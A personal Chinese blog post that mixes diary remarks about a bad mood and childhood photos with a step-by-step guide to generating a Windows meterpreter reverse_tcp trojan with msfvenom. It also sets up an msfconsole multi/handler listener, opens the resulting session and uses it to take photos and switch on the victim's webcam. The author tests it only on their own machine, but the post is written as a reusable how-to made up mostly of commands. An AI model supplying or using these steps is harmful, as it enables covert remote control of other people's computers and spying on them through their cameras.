msfvenom 摄像头

4.13 莫名其妙的心情不好

又回到了那个不想打游戏不想聊天不想说话的日子。

不用想。vm——>kali

 

 很早以前看过用msfvenom生成木马的文章。然后……然后我的浏览器就崩溃了。Firefox。只好用回edge。

然后。。看到了小时候的照片，从小到大。真的是不知不觉。18了就。

由于是在空间和博客同时发表。其实也没什么所谓了。各位社工大佬因该也看不上这张模糊的 。老照片！

 

>msfvenom

 

常用也是必须要的命令。-p 和-f 。 可以简单的理解为执行木马环境和其后缀名。

常用格式就是：msfvenom -p xx -f xx

一个简单的Windows下的木马生成就是：

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=xx -f exe -o xxx

默认生成在HOME 主文件夹下面。 更改-o参数可以修改保存位置。

 

lhost和lport是监听机子的ip和端口。

kali用ifconfig可以查看。

 

 

然后

进msf  msfconsole

use exploit/multi/handler

set lhost xx

set lport xx

进入到模块 设置监听。

 

然后

exploit 开始监听。  详细命令：

http://www.myhack58.com/Article/60/76/2012/35370_2.htm

后面的2017文件夹是我在本机创建的ftp。  xx.exe就是木马。我们在本机运行测试效果。

 

 

然后sessions 查看回话。

sessions -i 1 进入到我们的回话中。 接下来就是重头戏了。本来想列出命令表。在网上找不到全的。

直接输入help就可以得到解释。  我们就看这两个命令：

第一个 拍照。

第二个 打开摄像头！

 

我们测试第二个。

 

 

他会打开一个浏览器。中间就是我们摄像头可以看到的东西了（被我用大拇指挡住了-_-）